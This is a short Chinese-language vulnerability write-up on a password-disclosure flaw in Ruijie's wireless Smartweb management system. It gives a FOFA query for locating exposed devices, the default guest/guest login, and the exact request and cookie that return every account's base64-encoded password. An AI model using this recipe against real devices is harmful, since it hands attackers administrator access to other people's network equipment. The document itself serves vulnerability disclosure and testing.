# 锐捷Smartweb管理系统 密码信息泄露漏洞
## 漏洞描述
锐捷网络股份有限公司无线smartweb管理系统存在逻辑缺陷漏洞,攻击者可从漏洞获取到管理员账号密码,从而以管理员权限登录。
## 漏洞影响
> [!NOTE]
>
> 锐捷网络股份有限公司 无线smartweb管理系统
## FOFA
> [!NOTE]
>
> title=”无线smartWeb–登录页面”
## 漏洞复现
登录页面如下
![](/static/qingy/锐捷Smartweb管理系统_密码信息泄露漏洞/img/1.png)
默认存在 guest账户,账号密码为 **guest/guest**
其中登录的过程中搜索admin的数据后发现请求了一个文件 **/web/xml/webuser-auth.xml**,而且响应中包含了 admin密码的base64加密
![](/static/qingy/锐捷Smartweb管理系统_密码信息泄露漏洞/img/2.png)
解密就可以获得 admin管理员的密码,尝试直接请求
“`
http://xxx.xxx.xxx.xxx/web/xml/webuser-auth.xml
Cookie添加
Cookie: login=1; oid=1.3.6.1.4.1.4881.1.1.10.1.3; type=WS5302; auth=Z3Vlc3Q6Z3Vlc3Q%3D; user=guest
“`
![](/static/qingy/锐捷Smartweb管理系统_密码信息泄露漏洞/img/3.png)
直接获得所有的账户的等级标志和base64加密的账号密码
## Goby & POC
> [!NOTE]
>
> 已上传 https://github.com/PeiQi0/PeiQi-WIKI-POC Goby & POC 目录中
>
> Ruijie_smartweb_password_information_disclosure
![](/static/qingy/锐捷Smartweb管理系统_密码信息泄露漏洞/img/4.png)
![](/static/qingy/锐捷Smartweb管理系统_密码信息泄露漏洞/img/5.png)
请登录后查看评论内容